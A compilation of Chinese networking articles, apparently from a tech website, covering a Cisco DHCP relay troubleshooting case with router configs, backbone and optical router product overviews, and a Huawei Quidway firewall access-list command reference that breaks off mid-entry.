    各变电所配置各种监控终端设备并与服务器上的专用卡相连。监控终端可采集各种温度控制、摄像、门禁、电力参数（电压、功率等）、报警、断电等监控指标。

    在登录授权范围内，任意一个配电所都可通过路由器和光端机直接登录分控中心、总控室的服务器及其它变电所，相互间进行访问。

    电力监控系统网络拓扑图

返回


电线——看不见的捣乱分子

《一键清理系统垃圾》

电线——看不见的捣乱分子

《中国电脑教育报》张近东

    一天到朋友家做客，我发觉电脑屏幕上的图标好像有些轻微的抖动。开始认为是刷新频率的事，于是将其调到了85Hz。回到桌面发现图标还是抖动，仔细观察发现显示器的画面都抖--看来是显示器的问题了。还好是品牌机，一个电话技服人员就来了。换上了一台备用的显示器，没想到，这台显示器也抖。难道是电源的事？从其另一个房间又接过来电源，故障依旧。这是什么原因？大家看着电脑、和这个老房子都发愁了。

    “墙里埋着的电话线、电源线对它不会有什么影响吧？”

    这是厂里的老楼，前后住过好几家，现在墙里埋着多少条线还真不好说。也许是这个原因。如果是它们在作怪，换换位置应该能解决！一挪之下果然抖动几乎看不到了。

    “上客厅，客厅的线没有人动过！”望着狭小的客厅和二十多年前的插座我们笑了。电脑被请到了客厅，哈哈，正常了。


调试路由器做中继代理的小插曲

《一键清理系统垃圾》

调试路由器做中继代理的小插曲

    ■网络环境
    我们的交换机用的是Cisco Catalyst 2948G，路由器用的是Cisco3640。交换机按端口分为两个虚拟子网VLAN1和VLAN2。VLAN1的IP地址范围为168.68.35.XXX，子网掩码为255.255.255.0；VLAN2的IP地址范围为168.68.36.XXX，子网掩码为255.255.255.0。交换机1口设为虚拟子网间的主干路（TRUNK），与Cisco3640的以太网口相连，2～40口被划分在VLAN1中，41～48被划分在VLAN2中。客户端使用的是Windows 95操作系统，安装TCP/IP协议接入VLAN1，服务器端使用的是Windows NT+SP4+微软的DHCP服务器，同时在VLAN2中安装TCP/IP协议接入VLAN2。逻辑示意图如下。客户端的IP地址用自动获得IP地址的方式，通过路由器做中继代理，由DHCP服务器分配一个IP地址。服务器的IP地址是168.68.36.8，子网掩码是255.255.255.0。交换机的IP地址是168.68.36.9，子网掩码是255.255.255.0。路由器IP地址是168.68.36.10，子网掩码是255.255.255.0。

    ■最初的路由器配置
    Cisco3640支持子口的设置。子口就是在单个物理接口上建立并保持多条逻辑连接，最初的路由器配置如下：

    interface FastEthernet1/0

     ip address 168.68.35.1 255.255.255.0

     no ip directed-broadcast

     fair-queue 64 256 0

    !

    interface FastEthernet1/0.1

     encapsulation dot1Q 1

     ip helper-address 168.68.36.8

     no ip directed-broadcast

    !

    interface FastEthernet1/0.2

     encapsulation dot1Q 2

     ip address 168.68.36.1 255.255.255.0

     no ip directed-broadcast

    router eigrp 100

     passive-interface Serial0/0

     network 168.0.0.0

     no auto-summary

    ■发现问题：客户端无法获得IP地址
    硬件连接好后，在客户端用Win95自带的Winipcfg命令获取IP地址时，问题出现了：客户端无法获取IP地址。从硬件连接看，问题可能出在网卡、网线、交换机、路由器四个方面。将客户端手工设置IP地址，能够ping通服务器、交换机、路由器，说明网卡、网线、交换机、路由器都工作正常，那问题会出在什么地方呢？会不会是路由器的配置语句不对呢？经查阅随机文档配置语句本身没有问题。为缩小问题的范围，我把客户端接入VLAN2中，这时客户端就能获取IP地址了，再将客户端接入VLAN1中，又不能获取IP地址了，看来是VLAN在捣乱。

    我们知道客户端第一次获取IP地址，要经过四步。每一步的信息传输 都是用广播发出的，其中任何一步在VLAN的传输中受阻都会使客户端无法获取IP地址，那么如何查看广播包在交换机中传输呢？在TCP/IP协议中，传输协议分为TCP和UDP，TCP是面向连接的协议，UDP是非面向连接的协议。从广播的性质来分析，广播包应该是UDP包，广播要通过路由器，而路由器又能监测UDP包，这样就可通过路由器查看广播包在VLAN间的传输了。输入路由器监测UDP包的命令debug ip udp 后发现，IP租用请求信息（DHCPDISCOVER）仅发送到了VLAN1中，没有传送到VLAN2中，这应该是客户端无法获得IP地址的关键。

    ■找到问题：原来出在IP上
    在路由器的配置中，ip helper-address 168.68.36.8这条命令的作用是负责指明UDP包传输的目的地址，IP租用请求信息没有被传送到VLAN2中，就是由于这条命令没起作用。再次查看随机文档，这条命令确实没写错。我正在百思不得其解时，猛然发现路由器以太网口的第二子口设置了IP地址，第一子口未设置IP地址，而母口却设置了IP地址，也就是说第一子口的IP地址已由母口决定了，那ip helper-address 168.68.36.8这条命令是否也应该设到母口上呢？我立刻动手将路由器的配置改写如下：

    interface FastEthernet1/0

     ip address 168.68.35.1 255.255.255.0

     ip helper-address 168.68.36.8

     no ip directed-broadcast

     fair-queue 64 256 0

    !

    interface FastEthernet1/0.1

     encapsulation dot1Q 1

     no ip directed-broadcast

    !

    interface FastEthernet1/0.2

     encapsulation dot1Q 2

     ip address 168.68.36.1 255.255.255.0

     no ip directed-broadcast

    router eigrp 100

     passive-interface Serial0/0

     network 168.0.0.0

     no auto-summary

    如此设置后，客户端就能够获得IP地址了。从这个问题的解决，可以推测出Cisco3640第一子口的配置信息都应设在母口上。事后我又查阅了一些有关书籍，证实这个推测是对的。

返回


高效交换路由器

《一键清理系统垃圾》

高效交换路由器

Cisco 12016千兆比特交换路由器

    名称：Cisco 12016千兆比特交换路由器

    供应商：Cisco 公司

    适用范围：供应商

    特点：可平滑扩展，实现资源保护

    Cisco 12016 提供80Gbps的增强型交换容量，且可扩展到320Gbps，从而帮助客户满足网络中不断增长的带宽需求。这种16槽的Cisco GSR配备有业界领先的线路卡系列，及信道化的OC12/STM-4接口，这些线路卡包括DS3、3c/STM-1(PoS)、OC-3c/STM-1 ATM、OC-12c/STM-4 PoS、OC-12c/STM-4 ATM、OC-48c/STM-16 PoS、千兆比特以太网 、快速以太网、OC-12c/STM-4和OC-48c/STM-16动态分组传输(DPT)。Cisco 12016的所有主要系统组件都有内置的强劲韧冗余配置，这些组件包括交换机快速时钟调度程序、路由处理器、电源和吹风机组件。Cisco 12016支持同步光纤网络(SONET)自动保护切换(APS)和同步数字分层(SDH)复用选择保护(MSP)，从而提供网络级冗余。当今的分组存储结构基于16 × 16交换结构，可扩展到64× 64交叉矩阵，而无线头阻塞。广泛地使用高速应用专用的集成电路(ASIC)确保了以最低的延迟按线速存储转发实时业务，这个结构还包含优化机制，实现硬件中的组播业务复制，从而大大增强这个重要的未来技术的性能。

返回


骨干路由器技术展望

《一键清理系统垃圾》

骨干路由器技术展望

    随着因特网在世界范围内的飞速增长，以IP业务为主的数据业务是当今世界信息业发展的主要推动力。据有关专家预测，每6～9个月，主要ISP的因特网骨干链路的带宽需求就增长一倍，2005年后，纯语音和数据流量之比将变成1∶99。不仅如此，其它业务（如视频、多媒体业务）也逐步向数字化汇聚，最终走向统一的IP业务。据此，能否有效地支持IP业务已成为某项新技术能否有长远技术寿命的标志。然而，由面向连接、时分复用、电路交换为主的传统网络已经不再适应这种发展趋势，人们对网络带宽需求的不断增长同现有网络速率的局限之矛盾日益突出。目前，ITU-T、因特网工程任务组（IETF）以及光因特网论坛（OIF）等国际组织正在联合众多的网络设备开发商、制造商以及网络业务供应商们，共同寻找一种建设、改造因特网骨干网的方案。

    ■互联网需要高性能路由器
    由于人们早已预见到了因特网迅速发展的趋势，在网络连接方面致力于扩大网络容量，起初把同步光纤网(SONET)作为广域网标准建设骨干网，但由于因特网的数据业务量一直爆炸性持续增长，使SONET网络难以承受因特网如此巨大的业务量。近年来，一项新的技术性——密集波分复用(DWDM)应运而生并逐步走向成熟，使得未来骨干网将步入一个全光网的时代。

    在理想的全光网中，信号的交换、选路、传输和恢复等所有功能都以光的形式进行，而不需要经过光/电、电/光变换。全光网由核心网、城域网和接入网三层组成，三者的基本结构相类似，由DWDM系统、光放大器、OADM(光分插复用器)和OXC(光交叉连接设备)等设备组成。全光网络以其巨大的带宽，处理速度高而误码率低，良好的协议透明性、波长路由特性、兼容性和可扩展性，成为下一代高速（超高速）宽带网络的首选。全光网发展决定了未来的因特网必将是构架在全光网上的光因特网。

    光因特网在端与端之间的连接中是靠全光网设备加上光交换/路由器完成的，路由器是最为关键的设备之一，而且与这种高速率网络相适应的路由器必须是高性能的。

    ■要依靠光的性能
    1997年下半年以来，世界上一些公司开始陆续推出采用专用集成电路进行路由识别、计算和转发的用于未来骨干网的高性能路由器。这些高性能路由器的问世使全光网络的实现向前迈进了一大步。高性能路由器安装在主干网络的核心，可以直接利用全光网络环境。鉴于高性能路由器具有传输速率极高的光接口(如2.4和10Gbps的光接口)， 过去由SONET终端执行的高数据率多路复用不再需要了。在业务层直接与传输层链接的情况下，高性能路由器将用作多业务网络的综合传输平台，可传输租用线业务、话音、视频和数据。换句话说，路由器将是两层网络结构的不可分割的组成部分之一。

    高性能路由器包括线速吉太位交换/路由器和光路由器。线速交换/路由器由I／O线路卡、交换机构和路由处理机组成。交换机构负责数据包的转发；路由处理机负责路由计算、服务质量（QoS）等。商品化的吉位线速交换/路由器的交换速率一般为10～60兆包/秒，包转发速率为10～60 Mbit/s，其时延和时延抖动为微秒数量级，在网络中即便通过多级线速路由交换机，其积累时延仍在可接受范围之内。光路由器是在网络核心各光波长通道之间设置MPLS协议和波长选路协议WaRP控制下的波长选择器件，实现选路交换快速形成新的光路径。波长的选路路由由内部交叉矩阵决定，一个N×N的交叉矩阵可以同时建立N2条路由，波长变换交叉连接可将任何光纤上的任何波长交叉连接到使用不同波长的任何光纤上，具有最高的灵活性。

    高性能路由器能够提供数量极大的传输带宽，支持的任何数据率接口结合，如与2.5、10、40Gbps或更高的数据率接口打破信息传输的“瓶颈”。不仅如此，高性能路由器还能很好地解决以往路由器中长期困扰人们的QoS、流控和价格昂贵问题，它所具有的众多优点正是对原有路由器缺陷的克服。

    近年来，各路由器生产厂商已开始研制生产出了一些新型的高性能路由器。典型产品有Cisco 的ONS15900光路由器和GSR12016，（北京电信公众IP骨干网高端采用的路由器就是这一种）和朗讯公司的WaveStar Lambda路由器和电信级Nexabit NX64000多太位核心交换机/路由器。朗讯公司表示，Lambda路由器可以将运营商的运行费用减少25%，运营商可以很方便地配置Lambda路由器，迅速地在网络上提供光路径。此外，还有CORVIS的CoreWave光路由器，Monterey Networks公司的Monterey 20000 波长路由器，Juniper的M160线速吉位路由器，北电的Versalar 25000IP核心交换路由器以及Packet Engines公司的PowerRail 5200吉位线速路由器。这些高性能路由器的出现将为电信级运营商提供很好的骨干网组网方案。

    值得一提的是Meta路由器，为了提高网络中互连路由器并行工作的效率, 利用数学中的伽罗瓦群，路由器阵列将数据流分布到连接起来的路由器上，从而减少了包碰撞的可能性。在路由器阵列内部，路由路径更短，这样可以大大减少使用路由器的数量,称为Meta路由器。

    国内一些学校和公司（如清华大学、北京邮电大学、上海交通大学和烽火通信科技股份有限公司）也正在从事高性能路由器的研发工作。

    ■实验证明光的能力
    高性能路由器已在少数发达国家中得以实现或处于实验阶段，结果令人乐观。举例如下：

    美国的SuperNet实验型因特网主干网在波士顿和华盛顿特区之间建立起2.5Gbps的线路，在波士顿地区建立起连接5个站点的2.5Gbps网络，在旧金山海湾地区建立起连接4个站点的2.5Gbps光环路，使传输速率比目前的因特网高100倍。并在加利福尼亚的洛杉矶和奥克兰之间建立起10Gbps的光链路，在华盛顿特区建成20Gbps的连接6个政府站点的光环网络。目前正在建设的东起华盛顿特区，西至洛杉矶的远程主干网链路，将通过6个区域性研究网络连接100个研究机构，以2.5～20Gbps的速率，为远程医疗、远程教育和电视会议等实时应用传送巨量数据，使美国在因特网技术领域居领先地位。

    1999年11月23日Corvis和Qwest宣布联合在Qwest网上用Corvis的CoreWave光路由器进行了OC-48和OC-192的远程传输试验，交换速率达2.4Tbps，并实现了传输3200公里而不使用电再生器。

    由Bell Nexxia、Nortel、Cisco、JDS Uniphase、Newbridge在加拿大联合实现的CA*net3是加拿大第三代Internet骨干网，也是世界上第一个全国性光因特网。CA*net3采用32波长，Versalar 25000IP核心交换路由器，最高容量为40Gbit/s，超过世界上任何现有因特网的速度，下载2个半小时的电影“泰坦尼克号”只需1/15s。

    在国内，中国网络通信有限公司（CHINA NETCOM）在天津-北京-石家庄段IP over WDM现场实验中，采用Cisco的GSR12016和Juniper的M160线速吉位路由器，往返传输多次总长度2870公里，交换容量在10Gbps以上，见下图。

    试验结果表明，光路由器由于能保持信号的光域特性，突破了电子网络的速率瓶颈，可以快速为客户提供端到端的高速宽带路由及虚拟光纤网络，可以为网络提供商节约25％的费用，和电子交换系统相比，可以提高速率十几倍。线速吉太位路由器应用电信级骨干网也将使骨干网上的交换/路由性能大大提高。

    ■全光网下的理想
    世界各国都在着手研究开发全光网络产品，力求解决现行通信网中由于电子处理速度而形成的瓶颈问题。以光交换技术为基础的全光网络将是新世纪的骨干网络。

    我国的通信网规模已跃居世界前列，已形成相当的光纤骨干网格局，随着通信业务量的飞速增长和形式日趋多样化，如何在现有通信网的基础上进一步扩大通信容量和实现业务的交叉互连将成为迫切的实际问题，作为未来通信发展方向的WDM光传送网，可为这一迫切问题提供很好的解决方案。

    据有关资料统计，通信产业投入1亿元会在10年内使国民生产总值增加13.8亿。社会效益比自身的经济效益大得多。通信网中一般交换/路由设备的投入远大于传输产品，因此，用于未来骨干网上的路由器产品的市场潜力很值得挖掘。

    了解未来骨干网路由器，对电信级网络运营商而言，将有助于如何选择价格性能比最佳的骨干网路由器；而对于非电信级网络运营商和一般用户而言，可让您知道什么样的路由器能使您真正进入一个崭新的信息时代。

    京津石IP/DWDM现场试验

返回


光网与分组网络牵手

《一键清理系统垃圾》

光网与分组网络牵手

    通信发展日新月异，光网络容量持续翻番，网络以前所未有的规模与复杂度发展着。惟一不变的是，为了在竞争中获胜，运营商们必须在为用户提供更大的带宽和更可靠的服务的同时，保持较低的网络成本。北电网络的OPTera分组解决方案正是满足这些要求的一种解决方案。

    图1 OPTera分组解决方案网络结构

    OPTera分组解决方案将光网络与分组网络合二为一，成为一个能够传送各种类型业务的强大体系。据统计，在目前所有的因特网故障中，有57%是“老一代”路由器引起的。如果采用规模灵活的OPTera分组解决方案,则可实现高度可靠的交换及路由功能，同时还可提供高达几个直至几百Tbps的带宽。该方案不仅是运营商级的太位比特路由器，不仅是光交换机，也不仅是多业务平台，而且还能提供分组网络层及光网络层的互通、高可靠性、一网支持IP/ATM/帧中继/TDM的能力，以及可据需要灵活配置的几百Tbps的带宽。

    ■ OPTera能做什么

    1. 智能化分组/光网络互通

    OPTera的优势之一是，通过智能化处理实现网络拓扑信息及网络状态信息在分组网络层与光网络层之间的共享。举例来说，当路由层遇到网络拥塞或故障时，它可立即从光网络层要求并获取更多的带宽。这种“聪明”的分组层/光层互通是通过北电的OPTera网络控制软件实现的，OPTera通过它得以动态并连续地优化网络。

    2. 99.999%的可靠性

    为了使业务提供者能够实现包括分组电话在内的性能关键业务，IP网络必须大大提高其可靠性。在今天的因特网中，基于企业数据通信市场演进而来的“传统”IP路由技术成为了网络中较弱的环节。而OPTera基于运营级的硬件及软件，它所提供的可靠性水平堪与话音网络媲美。通过更加可靠的路由及交换、智能化的分组/光的融合、多协议标识交换(MPLS)业务工程以及一系列其他因素，OPTera的网络可靠性达到比目前因特网高一至两个数量级的水平。在此基础上，再加上如硬件冗余、无业务影响的软件升级以及运营高级的软件实现等一系列系统特性后，OPTera分组方案可提供99.999%的网络可靠性，业务供应商因而能够向其用户提供服务等级协议保证(SLA)以及各种性能关键业务。

    3.分组集成

    今天，许多业务供应商必须通过不同的相互叠加的网络来实现不同类型的业务，如用于提供话音业务的网络、用于提供专线的网络、用于提供ATM和IP的网络，而且运营商必须面临是继续投资于ATM还是全面转向IP的艰难选择。OPTera分组方案在经济有效的前提下，将ATM、FrameRelay及TDM网络合并为一个能够传送所有业务类型的核心网。OPTera分组方案中分组集成的关键在于高度可靠的交换结构及有力的多协议标识交换（MPLS）实现。

    4.最高可至几百Tbps的灵活规模选择

    保持网络处理能力与业务发展的一致性是国家级与国际级因特网业务供应商所面临的首要问题。目前，形成网络基本瓶颈的是“传统”路由器，因为它们不支持高速光接口(如STM-64)，并且它们难以实现超过100Gbps的无阻塞吞吐能力。

    通过建立经济有效的从Gbps直至几百Tbps的平滑容量演进，OPTera使上述问题迎刃而解。业务供应商可以根据需要先购买一台路由器，然后在适当的时候将这台路由器及其他路由器与OPTera分组核心集成，形成一个整合的单一逻辑路由器。OPTera分组核心的结构可允许运营商最终实现高达几百Tbps的无阻塞吞吐能力。

    ■ OPTera的构成是什么

    1.OPTera分组核心

    OPTera分组方案的基础是OPTera分组核心(OPC)，它是IP/MPLS交换路由器，通过它，OPTera的所有部分得以结合在一起。OPTera分组核心可以实现最高至几百Tbps的无阻塞吞吐，同时支持各类业务。

    图2 OPTera分组解决方案节点结构

    OPTera分组核心基于多路径同步结构，具有完全分布的事务安排、同步、数据、以及控制等路径，从而保证不会产生故障集中点。在出现故障时，该结构可提供快速的由硬件驱动的故障恢复来消除无效路径。此过程不涉及任何软件，也不对业务路由作任何改变。

    通过每秒10Gbps或以后40Gbps的光缆，多个机框可相互连接形成一个无阻塞路由器。全系统作为一个整合的单一实体来运行及管理。通过这种互连方式所形成的交换容量可高达19.2Tbps乃至更高。

    1)OPTera分组核心实现运营级的可靠性：

    -多路径交换结构

    通过高度互连的交换结构实现了极高的硬件可靠性，因为该交换结构采用了通过硬件实现的故障检测机制，从而能够达成优于百万分之一秒的故障恢复速度。

    -先进的网络保护/恢复机制

    这是快速可靠的网络恢复的原因所在。OPTera分组核心通过采用MPLS来保障快速可靠的网络故障恢复。OPC同时支持智能的分组/光网络互通。

    -硬件可靠性

    这是通过对OPTera分组核心中所有关键的硬件部分进行备份来实现的。

    -分布的故障可能/模块化的软件结构

    通过简化设计减少软件故障以及将软件故障控制在一定模块内进行快速本地恢复，软件的可靠性得以大大提高。

    2)MPLS的功能

    在OPTera分组方案的建立中，充分利用了MPLS将多个昂贵的叠加网络合并为一个简化的网络来处理多种业务类型。通过区分逻辑业务种类，如IP、ATM与FrameRelay，OPTera分组方案可实现用户及网络在公共的核心网络设备上的分隔。这种分隔是由强大而灵活的硬件与软件结构提供的。这些结构督管输入安排输出，保障所有业务的服务品质(QoS)。

    此外，OPTera分组方案对每条链路提供可选的MPLS高级网络保护/恢复，以通过MPLS多路由方式来实现快速可靠的网络恢复。这一特性保障了网络故障在少于100毫秒的时间内完成快速可靠的恢复。

    3)OPTera网络控制器的软件

    OPTera网络控制器软件可支持光与分组网络层间的互通，这种智能的分组/光互通软件是OPTera分组方案最强大的特点之一，它实现了网络的动态优化。OPTera网络控制软件通过交换网络状态与拓扑信息并基于已建立的策略提出网络变更建议，从而支持迅速的新业务生成、自动优化网络利用，而无需介入昂贵的人工再配置。

    OPTera网络控制软件可驻留于OPTera分组方案的任一元素中，根据网络状况综合调整分组层及光层。在网络拥塞、链路利用率较低或要求新业务时，OPTera网络控制器软件指挥系统在物理数据链路层和网络层面上建立、断开或改变连接，或者改变MPLS路径的相关权值以引导业务走向。

    2.OPTeraConnect

    OPTeraConnect是用于大容量、高性能、高可靠性的核心网的新型多太比光交叉连接(OXC)平台。它对所接光系统进行灵活的管理，提供前所未有的规模灵活性、透明性以及网络预测容限，支持业务灵活性、对连接与网络的管理以及网络保护和恢复。

    OPTeraConnect使得光网络层从一个为专线业务提供静态连接的支持性设施，演进为能够根据上一级业务层要求或通过其他外部控制机制来智能地分配网络资源的动态设施。它通过将先进的端到端连接管理能力与统一的光/分组网络拓朴/状态信息相结合实现了智能化的光/分组互通。这种互通优化了网络中成百上千的SDH节点、路由器以及ATM交换机，同时协调了对这些元素的网络管理。

    3. Versalar交换式路由器25000

    OPTera分组解决方案采用北电网络Versalar交换式路由器25000作为其IP外围设备。它可提供高达480Gbps的处理能力，支持速率从45Mbps到STM-64(10Gbps)的各种接口。当用作OPTera分组方案的组成部分时，多个Versalar交换式路由器可集成为一个单跳系统，支持多个Tbps的处理能力。

    4. Passport15000多业务交换机

    北电网络Passport15000ATM多业务交换机是OPTera分组解决方案的多业务外设。其处理能力为40Gbps，并提供速率从2Mbps到STM-16(2.5Gbps)的广泛的多业务接口(如ATM、FrameRelay、电路模拟业务以及IP等)。

    5. Preside网络管理软件

    OPTera分组解决方案中的所有元素均通过北电网络Preside来管理。Preside是一个完整的管理应用体系，业务提供者能够降低网络运营成本，同时提供优质的网络业务。Preside能够显示并合理关联不同级别的信息，从而统一网络表示，形成单一的管理接口。

返回


华为路由器防火墙配置命令总结

《一键清理系统垃圾》

华为路由器防火墙配置命令总结

    一、access-list 用于创建访问规则。

    （1）创建标准访问列表

    access-list [ normal | special ] listnumber1 { permit | deny } source-addr [ source-mask ]

    （2）创建扩展访问列表

    access-list [ normal | special ] listnumber2 { permit | deny } protocol source-addr source-mask [ operator port1 [ port2 ] ] dest-addr dest-mask [ operator port1 [ port2 ] | icmp-type [ icmp-code ] ] [ log ]

    （3）删除访问列表

    no access-list { normal | special } { all | listnumber [ subitem ] }

    【参数说明】

    normal 指定规则加入普通时间段。

    special 指定规则加入特殊时间段。

    listnumber1 是1到99之间的一个数值，表示规则是标准访问列表规则。

    listnumber2 是100到199之间的一个数值，表示规则是扩展访问列表规则。

    permit 表明允许满足条件的报文通过。

    deny 表明禁止满足条件的报文通过。

    protocol 为协议类型，支持ICMP、TCP、UDP等，其它的协议也支持，此时没有端口比较的概念；为IP时有特殊含义，代表所有的IP协议。

    source-addr 为源地址。

    source-mask 为源地址通配位，在标准访问列表中是可选项，不输入则代表通配位为0.0.0.0。

    dest-addr 为目的地址。

    dest-mask 为目的地址通配位。

    operator[可选] 端口操作符，在协议类型为TCP或UDP时支持端口比较，支持的比较操作有：等于（eq）、大于（gt）、小于（lt）、不等于（neq）或介于（range）；如果操作符为range，则后面需要跟两个端口。

    port1 在协议类型为TCP或UDP时出现，可以为关键字所设定的预设值（如telnet）或0~65535之间的一个数值。

    port2 在协议类型为TCP或UDP且操作类型为range时出现；可以为关键字所设定的预设值（如telnet）或0~65535之间的一个数值。

    icmp-type[可选] 在协议为ICMP时出现，代表ICMP报文类型；可以是关键字所设定的预设值（如echo-reply）或者是0~255之间的一个数值。

    icmp-code在协议为ICMP且没有选择所设定的预设值时出现；代表ICMP码，是0~255之间的一个数值。

    log [可选] 表示如果报文符合条件，需要做日志。

    listnumber 为删除的规则序号，是1~199之间的一个数值。

    subitem[可选] 指定删除序号为listnumber的访问列表中规则的序号。

    【缺省情况】

    系统缺省不配置任何访问规则。

    【命令模式】

    全局配置模式

    【使用指南】

    同一个序号的规则可以看作一类规则；所定义的规则不仅可以用来在接口上过滤报文，也可以被如DDR等用来判断一个报文是否是感兴趣的报文，此时，permit与deny表示是感兴趣的还是不感兴趣的。

    使用协议域为IP的扩展访问列表来表示所有的IP协议。

    同一个序号之间的规则按照一定的原则进行排列和选择，这个顺序可以通过 show access-list 命令看到。

    【举例】

    允许源地址为10.1.1.0 网络、目的地址为10.1.2.0网络的WWW访问，但不允许使用FTP。

    Quidway(config)#access-list 100 permit tcp 10.1.1.0 0.0.0.255 10.1.2.0 0.0.0.255 eq www

    Quidway(config)#access-list 100 deny tcp 10.1.1.0 0.0.0.255 10.1.2.0 0.0.0.255 eq ftp

    【相关命令】

    ip access-group

    二、clear access-list counters 清除访问列表规则的统计信息。

    clear access-list counters [ listnumber ]

    【参数说明】

    listnumber [可选] 要清除统计信息的规则的序号，如不指定，则清除所有的规则的统计信息。

    【缺省情况】

    任何时候都不清除统计信息。

    【命令模式】

    特权用户模式

    【使用指南】

    使用此命令来清除当前所用规则的统计信息，不指定规则编号则清除所有规则的统计信息。

    【举例】

    例1：清除当前所使用的序号为100的规则的统计信息。

    Quidway#clear access-list counters 100

    例2：清除当前所使用的所有规则的统计信息。

    Quidway#clear access-list counters

    【相关命令】

    access-list

    三、firewall 启用或禁止防火墙。

    firewall { enable | disable }

    【参数说明】

    enable 表示启用防火墙。

    disable 表示禁止防火墙。

    【缺省情况】

    系统缺省为禁止防火墙。

    【命令模式】

    全局配置模式

    【使用指南】

    使用此命令来启用或禁止防火墙，可以通过show firewall命令看到相应结果。如果采用了时间段包过滤，则在防火墙被关闭时也将被关闭；该命令控制防火墙的总开关。在使用 firewall disable 命令关闭防火墙时，防火墙本身的统计信息也将被清除。

    【举例】

    启用防火墙。

    Quidway(config)#firewall enable

    【相关命令】

    access-list，ip access-group

    四、firewall default 配置防火墙在没有相应的访问规则匹配时，缺省的过滤方式。

    firewall default { permit | deny }

    【参数说明】

    permit 表示缺省过滤属性设置为“允许”。

    deny 表示缺省过滤属性设置为“禁止”。

    【缺省情况】

    在防火墙开启的情况下，报文被缺省允许通过。

    【命令模式】

    全局配置模式

    【使用指南】

    当在接口应用的规则没有一个能够判断一个报文是否应该被允许还是禁止时，缺省的过滤属性将起作用；如果缺省过滤属性是“允许”，则报文可以通过，否则报文被丢弃。

    【举例】

    设置缺省过滤属性为“允许”。

    Quidway(config)#firewall default permit

    五、ip access-group 使用此命令将规则应用到接口上。使用此命令的no形式来删除相应的设置。

    ip access-group listnumber { in | out }

    [ no ] ip access-group listnumber { in | out }

    【参数说明】

    listnumber 为规则序号，是1~199之间的一个数值。

    in 表示规则用于过滤从接口收上来的报文。

    out 表示规则用于过滤从接口转发的报文。

    【缺省情况】

    没有规则应用于接口。

    【命令模式】

    接口配置模式。

    【使用指南】

    使用此命令来将规则应用到接口上；如果要过滤从接口收上来的报文，则使用 in 关键字；如果要过滤从接口转发的报文，使用out 关键字。一个接口的一个方向上最多可以应用20类不同的规则；这些规则之间按照规则序号的大小进行排列，序号大的排在前面，也就是优先级高。对报文进行过滤时，将采用发现符合的规则即得出过滤结果的方法来加快过滤速度。所以，建议在配置规则时，尽量将对同一个网络配置的规则放在同一个序号的访问列表中；在同一个序号的访问列表中，规则之间的排列和选择顺序可以用show access-list命令来查看。

    【举例】

    将规则101应用于过滤从以太网口收上来的报文。

    Quidway(config-if-Ethernet0)#ip access-group 101 in

    【相关命令】

    access-list
--------------------------------------------------------------------------------
作者: ┍風┑輕諾　　时间: 2006-6-5 21:34

    六、settr 设定或取消特殊时间段。

    settr begin-time end-time

    no settr

    【参数说明】

    begin-time 为一个时间段的开始时间。

    end-time 为一个时间段的结束时间，应该大于开始时间。

    【缺省情况】

    系统缺省没有设置时间段，即认为全部为普通时间段。

    【命令模式】

    全局配置模式

    【使用指南】

    使用此命令来设置时间段；可以最多同时设置6个时间段，通过show timerange 命令可以看到所设置的时间。如果在已经使用了一个时间段的情况下改变时间段，则此修改将在一分钟左右生效（系统查询时间段的时间间隔）。设置的时间应该是24小时制。如果要设置类似晚上9点到早上8点的时间段，可以设置成“settr 21:00 23:59 0:00 8:00”，因为所设置的时间段的两个端点属于时间段之内，故不会产生时间段内外的切换。另外这个设置也经过了2000问题的测试。

    【举例】

    例1：设置时间段为8:30 ~ 12:00，14:00 ~ 17:00。

    Quidway(config)#settr 8:30 12:00 14:00 17:00

    例2： 设置时间段为晚上9点到早上8点。

    Quidway(config)#settr 21:00 23:59 0:00 8:0

    【相关命令】

    timerange，show timerange

    七、show access-list 显示包过滤规则及在接口上的应用。

    show access-list [ all | listnumber | interface interface-name]

    【参数说明】

    all 表示所有的规则，包括普通时间段内及特殊时间段内的规则。

    listnumber 为显示当前所使用的规则中序号为listnumber的规则。

    interface 表示要显示在指定接口上应用的规则序号。

    interface-name 为接口的名称。

    【命令模式】

    特权用户模式

    【使用指南】

    使用此命令来显示所指定的规则，同时查看规则过滤报文的情况。每个规则都有一个相应的计数器，如果用此规则过滤了一个报文，则计数器加1；通过对计数器的观察可以看出所配置的规则中，哪些规则是比较有效，而哪些基本无效。可以通过带interface关键字的show access-list命令来查看某个接口应用规则的情况。

    【举例】

    例1：显示当前所使用的序号为100的规则。

    Quidway#show access-list 100

    Using normal packet-filtering access rules now.

    100 deny icmp 10.1.0.0 0.0.255.255 any host-redirect (3 matches,252 bytes -- rule 1)

    100 permit icmp 10.1.0.0 0.0.255.255 any echo (no matches -- rule 2)

    100 deny udp any any eq rip (no matches -- rule 3)

    例2： 显示接口Serial0上应用规则的情况。

    Quidway#show access-list interface serial 0

    Serial0:

    access-list filtering In-bound packets : 120

    access-list filtering Out-bound packets: None

    【相关命令】

    access-list

    八、show firewall 显示防火墙状态。

    show firewall

    【命令模式】

    特权用户模式

    【使用指南】

    使用此命令来显示防火墙的状态，包括防火墙是否被启用，启用防火墙时是否采用了时间段包过滤及防火墙的一些统计信息。

    【举例】

    显示防火墙状态。

    Quidway#show firewall

    Firewall is enable, default filtering method is 'permit'.

    TimeRange packet-filtering enable.

    InBound packets: None;

    OutBound packets: 0 packets, 0 bytes, 0% permitted,

    0 packets, 0 bytes, 0% denied,

    2 packets, 104 bytes, 100% permitted defaultly,

    0 packets, 0 bytes, 100% denied defaultly.

    From 00:13:02 to 06:13:21: 0 packets, 0 bytes, permitted.

    【相关命令】

    firewall

    九、show isintr 显示当前时间是否在时间段之内。

    show isintr

    【命令模式】

    特权用户模式

    【使用指南】

    使用此命令来显示当前时间是否在时间段之内。

    【举例】

    显示当前时间是否在时间段之内。

    Quidway#show isintr

    It is NOT in time ranges now.

    【相关命令】

    timerange，settr

    十、show timerange 显示时间段包过滤的信息。

    show timerange

    【命令模式】

    特权用户模式

    【使用指南】

    使用此命令来显示当前是否允许时间段包过滤及所设置的时间段。

    【举例】

    显示时间段包过滤的信息。

    Quidway#show timerange

    TimeRange packet-filtering enable.

    beginning of time range:

    01:00 - 02:00

    03:00 - 04:00

    end of time range.

    【相关命令】

    timerange，settr

    十一、timerange 启用或禁止时间段包过滤功能。

    timerange { enable | disable }

    【参数说明】

    enable 表示启用时间段包过滤。

    disable 表示禁止采用时间段包过滤。

    【缺省情况】

    系统缺省为禁止时间段包过滤功能。

    【命令模式】

    全局配置模式

    【使用指南】

